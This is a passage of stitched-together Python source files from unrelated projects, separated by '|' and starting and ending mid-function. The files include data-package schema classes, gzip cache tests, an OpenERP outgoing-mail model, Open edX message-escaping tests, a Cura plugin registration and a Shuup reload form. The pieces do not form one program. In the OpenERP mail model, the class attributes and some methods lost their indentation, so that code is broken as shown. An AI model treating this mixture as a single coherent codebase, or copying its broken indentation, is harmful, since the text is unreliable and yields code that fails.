    if waiting:
        # Unresolved endpoints remain: flag the output as incomplete.
        ast_head.nodes.insert(0, Ast_Comment(""))
        ast_head.nodes.insert(0, Ast_Comment(""))
        ast_head.nodes.insert(0,
            Ast_Comment("WARNING: there is a bug, the output is incomplete !"))
        ast_head.nodes.insert(0, Ast_Comment(""))
        ast_head.nodes.insert(0, Ast_Comment(""))
        return ast, False
    return ast, True
|
import collections
class AsaList(object):
    @classmethod
    def flatten(cls, lst):
        """
        Recursively flatten *lst*, yielding its non-iterable values.

        Strings and bytes are yielded as atomic values: iterating them
        would recurse forever, since a 1-character string iterates to
        itself.
        """
        # collections.Iterable was deprecated in 3.3 and removed in 3.10;
        # fall back for very old interpreters.
        try:
            from collections.abc import Iterable
        except ImportError:  # pragma: no cover - legacy Python fallback
            from collections import Iterable
        for item in lst:
            if isinstance(item, (str, bytes)) or not isinstance(item, Iterable):
                yield item
            else:
                for sub in cls.flatten(item):
                    yield sub
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .util import Specification
from . import compat
class Field(Specification):
    """
    Field object for adding fields to a resource schema.

    Currently this is built around the Tabular Data Package.
    """

    # Allowed descriptor keys and the type each value must conform to
    # (validation is performed by the Specification base class).
    SPECIFICATION = {'name': compat.str,
                     'title': compat.str,
                     'type': compat.str,
                     'format': compat.str,
                     'constraints': dict}
    # 'name' is the only attribute a field is required to provide.
    REQUIRED = ('name',)
class Constraints(Specification):
    """
    Constraints object which can be added to a field in a resource schema
    in order to represent the constraints put on that particular field.
    """

    # Allowed constraint keys and their expected value types.
    # NOTE(review): minimum/maximum map to None — presumably meaning
    # "any type accepted" (they depend on the field's type); confirm
    # against the Specification base class.
    SPECIFICATION = {'required': bool,
                     'minLength': int,
                     'maxLength': int,
                     'unique': bool,
                     'pattern': compat.str,
                     'minimum': None,
                     'maximum': None}
class Reference(Specification):
    """
    Reference object which can be added to a ForeignKey object to represent
    the reference to the other datapackage.
    """

    SPECIFICATION = {'datapackage': compat.str,
                     'resource': compat.str,
                     'fields': (compat.str, list)}
    REQUIRED = ('fields',)

    def __setattr__(self, attribute, value):
        """Normalise 'fields' so it always stores field *names*."""
        if attribute == 'fields':
            if type(value) == list:
                # A list may mix plain names and Field objects; collapse
                # everything to the name strings.
                names = []
                for entry in value:
                    if type(entry) == compat.str:
                        names.append(entry)
                    elif isinstance(entry, Field):
                        names.append(entry.name)
                    else:
                        raise TypeError(
                            'Field type ({0}) is not supported'.format(
                                type(entry)))
                value = names
            elif type(value) == compat.str:
                # A bare name is stored untouched.
                pass
            elif isinstance(value, Field):
                # A single Field collapses to its name.
                value = value.name
            else:
                raise TypeError("Type of field ({0}) is not supported".format(
                    type(value)))
        super(Reference, self).__setattr__(attribute, value)
class ForeignKey(Specification):
    """
    ForeignKey object which can be added to a resource schema object to
    represent a foreign key in another data package.

    Setting 'fields' or 'reference' cross-validates the two attributes:
    they must have the same type, and lists must have the same length.
    """

    SPECIFICATION = {'fields': (compat.str, list),
                     'reference': Reference}
    REQUIRED = ('fields', 'reference')

    def __setattr__(self, attribute, value):
        # If the attribute is 'reference' we need to check if there is a
        # fields attribute and do some checks to see if they are inconsistent
        # because they shouldn't be
        if attribute == 'reference' and 'fields' in self:
            fields = self['fields']
            if type(fields) != type(value.fields):
                raise TypeError(
                    'Reference fields must have the same type as fields')
            if type(value.fields) == list:
                if len(value.fields) != len(fields):
                    raise ValueError(
                        'Reference fields and fields are inconsistent')
        if attribute == 'fields':
            value_type = type(value)
            # We only want to show the names of the fields, so when the
            # value is a list we go through it and replace every Field
            # object by its name.
            if value_type == list:
                modified_value = []
                for single_value in value:
                    if type(single_value) == compat.str:
                        modified_value.append(single_value)
                    elif isinstance(single_value, Field):
                        modified_value.append(single_value.name)
                    else:
                        raise TypeError(
                            'Foreign key type ({0}) is not supported'.format(
                                type(single_value)))
                value = modified_value
            elif value_type == compat.str:
                # We don't need to do anything if the value is a str
                pass
            elif isinstance(value, Field):
                value = value.name
            else:
                raise TypeError("Type of field ({0}) is not supported".format(
                    value_type))
            # Same check as before about inconsistencies but just the other
            # way around
            if 'reference' in self:
                reference_fields = self['reference'].fields
                if type(reference_fields) != value_type:
                    raise TypeError(
                        'Fields must have the same type as Reference fields')
                if type(reference_fields) == list:
                    if len(reference_fields) != len(value):
                        raise ValueError(
                            'Reference fields and fields are inconsistent')
        super(ForeignKey, self).__setattr__(attribute, value)
class Schema(Specification):
    """
    Schema object which holds the representation of the schema for a
    Tabular Data Package (using the JSON Table Schema protocol). The
    schema can be used just like a dictionary which means it is ready
    for json serialization and export as part of a data package
    descriptor (when added to a resource).
    """

    SPECIFICATION = {'fields': list,
                     'primaryKey': (compat.str, list),
                     'foreignKeys': list}

    def __init__(self, *args, **kwargs):
        # We need to initialize an empty fields array (this is a required
        # field but we don't require it, we create it)
        self['fields'] = []
        # We add the fields using the internal method so we can do
        # validation of each field
        self.add_fields(kwargs.pop('fields', []))
        # NOTE(review): `self` is also passed as the first positional
        # argument here, so Specification.__init__ receives this instance
        # both bound and in *args — looks suspicious; confirm against
        # Specification's constructor before changing.
        super(Schema, self).__init__(self, *args, **kwargs)

    def __setattr__(self, attribute, value):
        # A primaryKey must reference existing schema fields; Field
        # objects are normalised to their names on assignment.
        if attribute == 'primaryKey' and value is not None:
            # Primary Keys must be a reference to existing fields so we
            # need to check if the primary key is in the fields array
            field_names = [f.name for f in self.get('fields', [])]
            if type(value) == list:
                modified_value = []
                for single_value in value:
                    if type(single_value) == compat.str:
                        if single_value in field_names:
                            modified_value.append(single_value)
                        else:
                            raise AttributeError(
                                "Unknown '{0}' cannot be primaryKey".format(
                                    single_value))
                    elif isinstance(single_value, Field):
                        if single_value.name in field_names:
                            modified_value.append(single_value.name)
                        else:
                            raise AttributeError(
                                "Unknown '{0}' cannot be primaryKey".format(
                                    single_value.name))
                    else:
                        raise TypeError(
                            'primaryKey type ({0}) is not supported'.format(
                                type(single_value)))
                value = modified_value
            elif type(value) == compat.str:
                if value not in field_names:
                    raise AttributeError(
                        "Unknown '{0}' cannot be primaryKey".format(
                            value))
            elif isinstance(value, Field):
                if value.name in field_names:
                    value = value.name
                else:
                    raise AttributeError(
                        "Unknown '{0}' cannot be primaryKey".format(
                            value.name))
            else:
                raise TypeError('Primary Key type ({0}) not supported'.format(
                    type(value)))
        super(Schema, self).__setattr__(attribute, value)

    def add_field(self, field):
        """
        Adds a field to the resource schema

        :param ~Field field: A Field instance containing the field to be
            appended to the schema (a plain dict is wrapped in a Field).
        """
        if isinstance(field, Field):
            self['fields'].append(field)
        elif type(field) == dict:
            self['fields'].append(Field(field))
        else:
            raise TypeError("Type of parameter field is not supported.")

    def add_fields(self, fields):
        """
        Adds fields to the resource schema

        :param list fields: A list of Field instances which should be
            appended (extend) to the resource schema fields.
        """
        # We loop through the fields list to make sure all elements
        # in the list are of the proper type
        for field in fields:
            self.add_field(field)

    def add_foreign_key(self, foreign_key):
        """
        Adds a foreign key to the resource schema.

        :param ~ForeignKey foreign_key: A ForeignKey object which keeps
            track of a foreign key relationship to another data package.
        :raises TypeError: when foreign_key is not a ForeignKey
        :raises ValueError: when it references a field not in the schema
        """
        # We can only accept ForeignKey objects
        if not isinstance(foreign_key, ForeignKey):
            raise TypeError("Foreign Key type is not supported")
        # ForeignKey fields must be a schema field
        field_names = [f.name for f in self.get('fields', [])]
        for field in foreign_key.fields:
            if field not in field_names:
                raise ValueError(
                    "Foreign key field '{0}' is not in schema fields".format(
                        field))
        # Append the ForeignKey to the foreignKeys object or create it if it
        # doesn't exist
        foreign_keys = dict.get(self, 'foreignKeys', [])
        foreign_keys.append(foreign_key)
        self['foreignKeys'] = foreign_keys

    def add_foreign_keys(self, foreign_keys):
        """
        Adds foreign keys to the resource schema

        :param list foreign_keys: A list of ForeignKey instances which should
            be appended (extend) to the resource schema fields or create a
            foreignKeys attribute if it doesn't exist.
        """
        # We loop through the foreign keys list to make sure all elements
        # in the list are of the proper type and validate
        for foreign_key in foreign_keys:
            self.add_foreign_key(foreign_key)
|
__author__ = 'Sun'
from sandbox.dynamic_title.creator.char_corpus import CharacterCorpus
import cPickle
import click
@click.command()
@click.argument("text_file", type=click.File(mode='r', encoding='gb18030'))
@click.argument("char_cropus_file", type=click.File(mode='wb'))
def make_char_corpus(text_file, char_cropus_file):
    """Build a character corpus from a GB18030-encoded text file and
    pickle it to the output file.

    NOTE(review): "char_cropus_file" looks like a typo for "corpus", but
    the name is part of the CLI argument interface, so it is kept.
    """
    corpus = CharacterCorpus()
    corpus.build(text_file)
    # Highest protocol for the most compact/fastest pickle.
    cPickle.dump(corpus, char_cropus_file, protocol=cPickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
    make_char_corpus()
|
def replace_0_5_iterative(user_input):
    """Return *user_input* with every '0' character replaced by '5',
    built character by character."""
    chars = ["5" if ch == "0" else ch for ch in user_input]
    return "".join(chars)
def replace_0_5_pythonic(user_input):
    """Return *user_input* with every '0' replaced by '5' (one-liner)."""
    # Splitting on '0' and re-joining with '5' is equivalent to
    # str.replace('0', '5') for a non-empty separator.
    return "5".join(user_input.split("0"))
# Simple CLI demo: read a "number" as a string and show both
# implementations replacing every '0' digit with '5'.
user_input = input("Enter the number: ")
print("\n----- Iterative Approach -----")
new_str = replace_0_5_iterative(user_input)
print("Modified number: " + new_str)
print("\n----- Python Replace Approach -----")
new_str = replace_0_5_pythonic(user_input)
print("Modified number: " + new_str)
|
'''Core plugins unit tests'''
import os
import tempfile
import unittest
import time
from contextlib import contextmanager
from tempfile import mkdtemp
from shutil import rmtree
from hashlib import md5
import gzip_cache
@contextmanager
def temporary_folder():
    """Create a throwaway directory, yield its path, delete it on exit.

    This allows to do something like this in tests:

    >>> with temporary_folder() as d:
    # do whatever you want
    """
    path = mkdtemp()
    try:
        yield path
    finally:
        rmtree(path)
class TestGzipCache(unittest.TestCase):

    def test_should_compress(self):
        no_excludes = ()
        # Text-like outputs are worth compressing...
        for name in ('foo.html', 'bar.css', 'baz.js', 'foo.txt'):
            self.assertTrue(gzip_cache.should_compress(name, no_excludes))
        # ...while already-compressed / binary outputs are not.
        for name in ('foo.gz', 'bar.png', 'baz.mp3', 'foo.mov'):
            self.assertFalse(gzip_cache.should_compress(name, no_excludes))
        # User-supplied exclusions are honoured on top of the defaults.
        excludes = ('.html', '.xyz')
        for name in ('foo.html', 'bar.xyz', 'foo.gz'):
            self.assertFalse(gzip_cache.should_compress(name, excludes))
        self.assertTrue(gzip_cache.should_compress('baz.js', excludes))

    def test_should_overwrite(self):
        # Defaults to False when GZIP_CACHE_OVERWRITE is not set.
        self.assertFalse(gzip_cache.should_overwrite({}))
        self.assertFalse(gzip_cache.should_overwrite({'GZIP_CACHE_OVERWRITE': False}))
        self.assertTrue(gzip_cache.should_overwrite({'GZIP_CACHE_OVERWRITE': True}))

    def test_creates_gzip_file(self):
        # A file matching the input filename with a .gz extension is created.
        # The plugin walks over the output content after the finalized signal
        # so it is safe to assume that the file exists (otherwise walk would
        # not report it). Therefore, create a dummy file to use.
        with temporary_folder() as tempdir:
            _, html_path = tempfile.mkstemp(suffix='.html', dir=tempdir)
            with open(html_path, 'w') as fh:
                # Shorter contents would be skipped: compressing is useless
                # below this length and create_gzip_file creates no file.
                fh.write('A' * 24)
            gzip_cache.create_gzip_file(html_path, False)
            self.assertTrue(os.path.exists(html_path + '.gz'))

    def test_creates_same_gzip_file(self):
        # Should create the same gzip file from the same contents.
        # gzip will create a slightly different file because it includes
        # a timestamp in the compressed file by default. This can cause
        # problems for some caching strategies.
        with temporary_folder() as tempdir:
            _, html_path = tempfile.mkstemp(suffix='.html', dir=tempdir)
            with open(html_path, 'w') as fh:
                fh.write('A' * 24)
            gz_path = html_path + '.gz'
            gzip_cache.create_gzip_file(html_path, False)
            first_hash = get_md5(gz_path)
            time.sleep(1)
            gzip_cache.create_gzip_file(html_path, False)
            self.assertEqual(first_hash, get_md5(gz_path))

    def test_overwrites_gzip_file(self):
        # With overwrite enabled no separate .gz sibling is produced for
        # this (empty) dummy file.
        with temporary_folder() as tempdir:
            _, html_path = tempfile.mkstemp(suffix='.html', dir=tempdir)
            gzip_cache.create_gzip_file(html_path, True)
            self.assertFalse(os.path.exists(html_path + '.gz'))
def get_md5(filepath):
    """Return the hex MD5 digest of the file at *filepath*."""
    handle = open(filepath, 'rb')
    try:
        digest = md5(handle.read()).hexdigest()
    finally:
        handle.close()
    return digest
|
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
""" Model holding RFC2822 email messages to send. This model also provides
facilities to queue and send new email messages. """
_name = 'mail.mail'
_description = 'Outgoing Mails'
_inherits = {'mail.message': 'mail_message_id'}
_order = 'id desc'
_columns = {
'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
'state': fields.selection([
('outgoing', 'Outgoing'),
('sent', 'Sent'),
('received', 'Received'),
('exception', 'Delivery Failed'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
'auto_delete': fields.boolean('Auto Delete',
help="Permanently delete this email after sending it, to save space"),
'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
'email_to': fields.text('To', help='Message recipients'),
'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
# Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
# and during unlink() we will not cascade delete the parent and its attachments
'notification': fields.boolean('Is Notification')
}
def _get_default_from(self, cr, uid, context=None):
this = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if this.alias_domain:
return '%s@%s' % (this.alias_name, this.alias_domain)
elif this.email:
return this.email
raise osv.except_osv(_('Invalid Action!'), _("Unable to send email, please configure the sender's email address or alias."))
_defaults = {
'state': 'outgoing',
'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
}
    def default_get(self, cr, uid, fields, context=None):
        """Strip an invalid leaking `default_type` from the context before
        delegating to the standard default_get."""
        # protection for `default_type` values leaking from menu action context (e.g. for invoices)
        # To remove when automatic context propagation is removed in web client
        if context and context.get('default_type') and context.get('default_type') not in self._all_columns['type'].column.selection:
            context = dict(context, default_type=None)
        return super(mail_mail, self).default_get(cr, uid, fields, context=context)
def create(self, cr, uid, values, context=None):
if 'notification' not in values and values.get('mail_message_id'):
values['notification'] = True
return super(mail_mail, self).create(cr, uid, values, context=context)
    def unlink(self, cr, uid, ids, context=None):
        """Delete mails and cascade-delete the parent mail.message of every
        mail that is NOT a notification.

        The parent message ids are collected *before* calling super(),
        since the mail records no longer exist afterwards.
        """
        # cascade-delete the parent message for all mails that are not created for a notification
        ids_to_cascade = self.search(cr, uid, [('notification', '=', False), ('id', 'in', ids)])
        parent_msg_ids = [m.mail_message_id.id for m in self.browse(cr, uid, ids_to_cascade, context=context)]
        res = super(mail_mail, self).unlink(cr, uid, ids, context=context)
        self.pool.get('mail.message').unlink(cr, uid, parent_msg_ids, context=context)
        return res
def mark_outgoing(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'outgoing'}, context=context)
def cancel(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
    def process_email_queue(self, cr, uid, ids=None, context=None):
        """Send immediately queued messages, committing after each
           message is sent - this is not transactional and should
           not be called during another transaction!

           :param list ids: optional list of emails ids to send. If passed
                            no search is performed, and these ids are used
                            instead.
           :param dict context: if a 'filters' key is present in context,
                                this value will be used as an additional
                                filter to further restrict the outgoing
                                messages to send (by default all 'outgoing'
                                messages are sent).
           :return: result of send(), or None when sending raised
        """
        if context is None:
            context = {}
        if not ids:
            filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
            if 'filters' in context:
                filters.extend(context['filters'])
            ids = self.search(cr, uid, filters, context=context)
        res = None
        try:
            # Force auto-commit - this is meant to be called by
            # the scheduler, and we can't allow rolling back the status
            # of previously sent emails!
            res = self.send(cr, uid, ids, auto_commit=True, context=context)
        except Exception:
            # Best-effort cron entry point: log and carry on.
            _logger.exception("Failed processing mail queue")
        return res
def _postprocess_sent_message(self, cr, uid, mail, context=None):
"""Perform any post-processing necessary after sending ``mail``
successfully, including deleting it completely along with its
attachment if the ``auto_delete`` flag of the mail was set.
Overridden by subclasses for extra post-processing behaviors.
:param browse_record mail: the mail that was just sent
:return: True
"""
if mail.auto_delete:
# done with SUPERUSER_ID to avoid giving large unlink access rights
self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
return True
def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
""" If subject is void and record_name defined: '<Author> posted on <Resource>'
:param boolean force: force the subject replacement
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if force or (not mail.subject and mail.model and mail.res_id):
return 'Re: %s' % (mail.record_name)
return mail.subject
    def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
        """ Return a specific ir_email body. The main purpose of this method
            is to be inherited by Portal, to add a link for signing in, in
            each notification email a partner receives.

            :param browse_record mail: mail.mail browse_record
            :param browse_record partner: specific recipient partner
            :return: HTML body, possibly extended with a direct-access link
        """
        body = mail.body_html
        # partner is a user, link to a related document (incentive to install portal)
        if partner and partner.user_ids and mail.model and mail.res_id \
                and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
            related_user = partner.user_ids[0]
            try:
                # Verify record-level access before advertising the link.
                self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
                base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
                # the parameters to encode for the query and fragment part of url
                query = {'db': cr.dbname}
                fragment = {
                    'login': related_user.login,
                    'model': mail.model,
                    'id': mail.res_id,
                }
                url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
                text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
                body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
            except except_orm, e:
                # No read access on the record: silently keep the plain body.
                pass
        return body
def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
    """Compute the Reply-To address for an outgoing email.

    Resolution order: the mail's explicit reply_to; otherwise the
    related document's alias (``message_get_reply_to``); otherwise the
    bare email part of the sender address. When tied to a document, the
    address is decorated as '"Followers of <doc>" <email>'.

    :param browse_record mail: mail.mail browse_record
    :param browse_record partner: specific recipient partner
    """
    # An explicit reply_to on the mail always wins.
    if mail.reply_to:
        return mail.reply_to
    reply_to = False
    # if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
    if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
        model_obj = self.pool.get(mail.model)
        reply_to = model_obj.message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
    # no alias reply_to -> reply_to will be the email_from, only the email part
    if not reply_to and mail.email_from:
        candidates = tools.email_split(mail.email_from)
        if candidates:
            reply_to = candidates[0]
    # format 'Document name <email_address>'
    if reply_to and mail.model and mail.res_id:
        document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
        if document_name:
            # sanitize document name: collapse anything unsafe to dashes
            safe_name = re.sub(r'[^\w+.]+', '-', document_name[1])
            # generate reply to
            reply_to = _('"Followers of %s" <%s>') % (safe_name, reply_to)
    return reply_to
def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
    """Assemble the value dictionary for one outgoing email.

    Gathers body, subject, reply-to and recipients, personalized for a
    given partner when one is provided, or generic for the addresses in
    ``mail.email_to`` otherwise.

    :param browse_record mail: mail.mail browse_record
    :param browse_record partner: specific recipient partner
    """
    body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
    subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
    reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
    plaintext_body = tools.html2plaintext(body)
    # Recipient heuristic:
    #   1. partner + related document -> '"Followers of <doc>" <email>'
    #   2. partner without a document -> 'Partner Name <email>'
    #   3. no partner -> split mail.email_to into a list of addresses
    if partner and mail.record_name:
        safe_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
        recipients = [_('"Followers of %s" <%s>') % (safe_record_name, partner.email)]
    elif partner:
        recipients = ['%s <%s>' % (partner.name, partner.email)]
    else:
        recipients = tools.email_split(mail.email_to)
    return {
        'body': body,
        'body_alternative': plaintext_body,
        'subject': subject,
        'email_to': recipients,
        'reply_to': reply_to,
    }
def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
    """ Sends the selected emails immediately, ignoring their current
        state (mails that have already been sent should not be passed
        unless they should actually be re-sent).
        Emails successfully delivered are marked as 'sent', and those
        that fail to be deliver are marked as 'exception', and the
        corresponding error mail is output in the server logs.

        :param bool auto_commit: whether to force a commit of the mail status
            after sending each mail (meant only for scheduler processing);
            should never be True during normal transactions (default: False)
        :param list recipient_ids: specific list of res.partner recipients.
            If set, one email is sent to each partner. Its is possible to
            tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
            If not specified, one email is sent to mail_mail.email_to.
        :return: True
    """
    ir_mail_server = self.pool.get('ir.mail_server')
    for mail in self.browse(cr, uid, ids, context=context):
        try:
            # handle attachments: decode stored base64 payloads once per mail
            attachments = []
            for attach in mail.attachment_ids:
                attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
            # specific behavior to customize the send email for notified partners
            email_list = []
            if recipient_ids:
                for partner in self.pool.get('res.partner').browse(cr, SUPERUSER_ID, recipient_ids, context=context):
                    email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
            else:
                email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
            # build an RFC2822 email.message.Message object and send it without queuing
            # Initialize before the loop so mail_sent is always bound, even
            # if email_list were ever empty (fixes a potential UnboundLocalError).
            mail_sent = False
            for email in email_list:
                msg = ir_mail_server.build_email(
                    email_from=mail.email_from,
                    email_to=email.get('email_to'),
                    subject=email.get('subject'),
                    body=email.get('body'),
                    body_alternative=email.get('body_alternative'),
                    email_cc=tools.email_split(mail.email_cc),
                    reply_to=email.get('reply_to'),
                    attachments=attachments,
                    message_id=mail.message_id,
                    references=mail.references,
                    object_id=mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
                    subtype='html',
                    subtype_alternative='plain')
                res = ir_mail_server.send_email(cr, uid, msg,
                    mail_server_id=mail.mail_server_id.id, context=context)
                if res:
                    mail.write({'state': 'sent', 'message_id': res})
                    mail_sent = True
                else:
                    mail.write({'state': 'exception'})
                    mail_sent = False
            # /!\ can't use mail.state here, as mail.refresh() will cause an error
            # see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
            if mail_sent:
                self._postprocess_sent_message(cr, uid, mail, context=context)
        except Exception:
            _logger.exception('failed sending mail.mail %s', mail.id)
            mail.write({'state': 'exception'})
        # idiom fix: truthiness test instead of comparing against True
        if auto_commit:
            cr.commit()
    return True
|
"""
Unit tests for user messages.
"""
import warnings
import ddt
from django.contrib.messages.middleware import MessageMiddleware
from django.test import RequestFactory, TestCase
from common.test.utils import normalize_repr
from openedx.core.djangolib.markup import HTML, Text
from common.djangoapps.student.tests.factories import UserFactory
from ..user_messages import PageLevelMessages, UserMessageType
TEST_MESSAGE = 'Test message'
@ddt.ddt
class UserMessagesTestCase(TestCase):
    """
    Unit tests for page level user messages.
    """
    def setUp(self):
        super().setUp()
        # Build an authenticated request with session + messages storage
        # initialized, so user messages can be registered against it.
        self.student = UserFactory.create()
        self.request = RequestFactory().request()
        self.request.session = {}
        self.request.user = self.student
        MessageMiddleware().process_request(self.request)

    @ddt.data(
        ('Rock & Roll', '<div class="message-content">Rock & Roll</div>'),
        (Text('Rock & Roll'), '<div class="message-content">Rock & Roll</div>'),
        (HTML('<p>Hello, world!</p>'), '<div class="message-content"><p>Hello, world!</p></div>')
    )
    @ddt.unpack
    def test_message_escaping(self, message, expected_message_html):
        """
        Verifies that a user message is escaped correctly.

        Plain strings and Text() are escaped; HTML() is trusted verbatim.
        """
        PageLevelMessages.register_user_message(self.request, UserMessageType.INFO, message)
        messages = list(PageLevelMessages.user_messages(self.request))
        assert len(messages) == 1
        assert messages[0].message_html == expected_message_html

    @ddt.data(
        (UserMessageType.ERROR, 'alert-danger', 'fa fa-warning'),
        (UserMessageType.INFO, 'alert-info', 'fa fa-bullhorn'),
        (UserMessageType.SUCCESS, 'alert-success', 'fa fa-check-circle'),
        (UserMessageType.WARNING, 'alert-warning', 'fa fa-warning'),
    )
    @ddt.unpack
    def test_message_icon(self, message_type, expected_css_class, expected_icon_class):
        """
        Verifies that a user message returns the correct CSS and icon classes.
        """
        PageLevelMessages.register_user_message(self.request, message_type, TEST_MESSAGE)
        messages = list(PageLevelMessages.user_messages(self.request))
        assert len(messages) == 1
        assert messages[0].css_class == expected_css_class
        assert messages[0].icon_class == expected_icon_class

    @ddt.data(
        (normalize_repr(PageLevelMessages.register_error_message), UserMessageType.ERROR),
        (normalize_repr(PageLevelMessages.register_info_message), UserMessageType.INFO),
        (normalize_repr(PageLevelMessages.register_success_message), UserMessageType.SUCCESS),
        (normalize_repr(PageLevelMessages.register_warning_message), UserMessageType.WARNING),
    )
    @ddt.unpack
    def test_message_type(self, register_message_function, expected_message_type):
        """
        Verifies that each user message function returns the correct type.
        """
        register_message_function(self.request, TEST_MESSAGE)
        messages = list(PageLevelMessages.user_messages(self.request))
        assert len(messages) == 1
        assert messages[0].type == expected_message_type

    def global_message_count(self):
        """
        Count the number of times the global message appears in the user messages.
        """
        # Matches the GLOBAL_NOTICE_MESSAGE used by the tests below.
        expected_html = """<div class="message-content">I <3 HTML-escaping</div>"""
        messages = list(PageLevelMessages.user_messages(self.request))
        return len(list(msg for msg in messages if expected_html in msg.message_html))

    def test_global_message_off_by_default(self):
        """Verifies feature toggle."""
        with self.settings(
                GLOBAL_NOTICE_ENABLED=False,
                GLOBAL_NOTICE_MESSAGE="I <3 HTML-escaping",
                GLOBAL_NOTICE_TYPE='WARNING'
        ):
            # Missing when feature disabled
            assert self.global_message_count() == 0

    def test_global_message_persistent(self):
        """Verifies global message is always included, when enabled."""
        with self.settings(
                GLOBAL_NOTICE_ENABLED=True,
                GLOBAL_NOTICE_MESSAGE="I <3 HTML-escaping",
                GLOBAL_NOTICE_TYPE='WARNING'
        ):
            # Present with no other setup
            assert self.global_message_count() == 1

            # Present when other messages are present
            PageLevelMessages.register_user_message(self.request, UserMessageType.INFO, "something else")
            assert self.global_message_count() == 1

    def test_global_message_error_isolation(self):
        """Verifies that any setting errors don't break the page, or other messages."""
        with self.settings(
                GLOBAL_NOTICE_ENABLED=True,
                GLOBAL_NOTICE_MESSAGE=ThrowingMarkup(),  # force an error
                GLOBAL_NOTICE_TYPE='invalid'
        ):
            PageLevelMessages.register_user_message(self.request, UserMessageType.WARNING, "something else")

            # Doesn't throw, or even interfere with other messages,
            # when given invalid settings
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                messages = list(PageLevelMessages.user_messages(self.request))
            assert len(w) == 1
            assert str(w[0].message) == "Could not register global notice: Exception('Some random error')"
            assert len(messages) == 1
            assert "something else" in messages[0].message_html
class ThrowingMarkup:
    """Object whose HTML conversion always fails.

    Used to exercise error-isolation paths: any attempt by markupsafe to
    coerce this object to HTML raises.
    """

    def __html__(self):
        # Simulate a failure during HTML conversion.
        raise Exception("Some random error")
|
from . import CuraProfileReader
from UM.i18n import i18nCatalog
catalog = i18nCatalog("cura")
def getMetaData():
    """Return the metadata describing the Cura Profile Reader plugin.

    Includes the translated plugin information and the file extension
    this reader handles.
    """
    plugin_info = {
        "name": catalog.i18nc("@label", "Cura Profile Reader"),
        "author": "Ultimaker",
        "version": "1.0",
        "description": catalog.i18nc("@info:whatsthis", "Provides support for importing Cura profiles."),
        "api": 3
    }
    reader_info = [
        {
            "extension": "curaprofile",
            "description": catalog.i18nc("@item:inlistbox", "Cura Profile")
        }
    ]
    return {"plugin": plugin_info, "profile_reader": reader_info}
def register(app):
    """Instantiate the profile reader and expose it to the application."""
    reader = CuraProfileReader.CuraProfileReader()
    return {"profile_reader": reader}
|
from __future__ import unicode_literals
import time
from django import forms
from django.conf import settings
from django.core.management import call_command
from django.http.response import HttpResponse, JsonResponse
from django.utils.translation import ugettext_lazy as _
from django.views.generic import FormView
from six import StringIO
from shuup.addons.manager import get_enabled_addons
from shuup.addons.reloader import get_reload_method_classes
from shuup.apps.settings import reload_apps
from shuup.utils.excs import Problem
from shuup.utils.iterables import first
class ReloadMethodForm(forms.Form):
    """Form letting the admin pick one of the viable server reload methods."""

    def get_viable_reload_methods(self):
        # Instantiate every known reload mechanism, keeping only those
        # that can actually run in the current deployment.
        for method_class in get_reload_method_classes():
            method = method_class()
            if method.is_viable():
                yield method

    def __init__(self, **kwargs):
        super(ReloadMethodForm, self).__init__(**kwargs)
        self.reload_methods = list(self.get_viable_reload_methods())
        if not self.reload_methods:
            raise Problem(_("There are no viable reload methods available. Please contact your system administrator."))
        method_choices = [(rm.identifier, rm.title) for rm in self.reload_methods]
        self.fields["reload_method"] = forms.ChoiceField(
            choices=method_choices,
            label=_("Reload Method"),
            initial=self.reload_methods[0].identifier,
            widget=forms.RadioSelect
        )

    def get_selected_reload_method(self):
        # Map the submitted identifier back to its reload method object.
